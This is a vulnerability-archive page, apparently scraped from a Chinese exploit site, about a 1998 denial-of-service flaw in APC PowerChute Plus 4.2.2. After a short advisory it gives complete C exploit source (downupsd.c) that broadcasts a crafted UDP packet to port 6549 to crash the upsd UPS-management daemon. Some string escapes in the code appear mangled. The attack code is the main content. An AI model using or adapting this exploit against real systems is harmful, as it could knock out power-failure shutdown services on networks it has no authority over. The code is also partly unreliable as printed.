APC PowerChute Plus 4.2.2 – Denial of Service
漏洞ID | 1053367 | 漏洞类型 | |
发布时间 | 1998-04-10 | 更新时间 | 1998-04-10 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
// source: http://www.securityfocus.com/bid/83/info
//
// APC PowerChute PLUS is a software package that will safely shutdown computer systems locally or accross a network when UPS power starts to fail. When operating PowerChute PLUS normally listens to TCP ports 6547 and 6548, as well as for broadcast requests in UDP port 6549.
//
// A request packet can be craftted and sent to the UDP port such that the upsd server will crash. This is been tested in the Solaris i386 version of the product.
//
// It has also been reported the software will crash in some instances when port scanned.
//
// It seems you can also manage any APC UPS remotely without providing any credential if you have the APC client software.
//
// Both the client and server software also create files insecurely in /tmp. The pager script (dialpager.sh) also contains unsafe users of temporary files. The mailer script (mailer.sh) passes the files provided in the command line to rm without checking them.
//
// ----- begin downupsd.c -----
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
int main(int argc, char **argv) {
int s;
long on=1;
size_t addrsize;
char buffer[256];
struct sockaddr_in toaddr, fromaddr;
struct hostent h_ent;
if(argc!=2) {
fprintf(stderr, ""Usage:nt%s <hostname running upsd>n"", argv[0]);
exit(0);
}
s = socket(AF_INET,SOCK_DGRAM,0);
setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));
printf(""Crashing upsd on host's subnet: %sn"", argv[1]);
toaddr.sin_family = AF_INET;
toaddr.sin_port = htons(0);
toaddr.sin_addr.s_addr = 0x00000000;
bind(s, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in));
toaddr.sin_port = htons(6549);
memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent));
memcpy(&toaddr.sin_addr.s_addr, h_ent.h_addr, sizeof(struct in_addr));
toaddr.sin_addr.s_addr |= 0xff000000;
strcpy(buffer, ""027|1|public|9|0|0|2010~|0 "");
sendto(s, buffer, 256, 0, (struct sockaddr *)&toaddr,
sizeof(struct sockaddr_in));
printf(""Crashed...n"");
close(s);
}
------- end downupsd.c -----
相关推荐: IRIX datman/cdman Vulnerability
IRIX datman/cdman Vulnerability 漏洞ID 1105096 漏洞类型 Access Validation Error 发布时间 1996-12-09 更新时间 1996-12-09 CVE编号 N/A CNNVD-ID N/A 漏…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666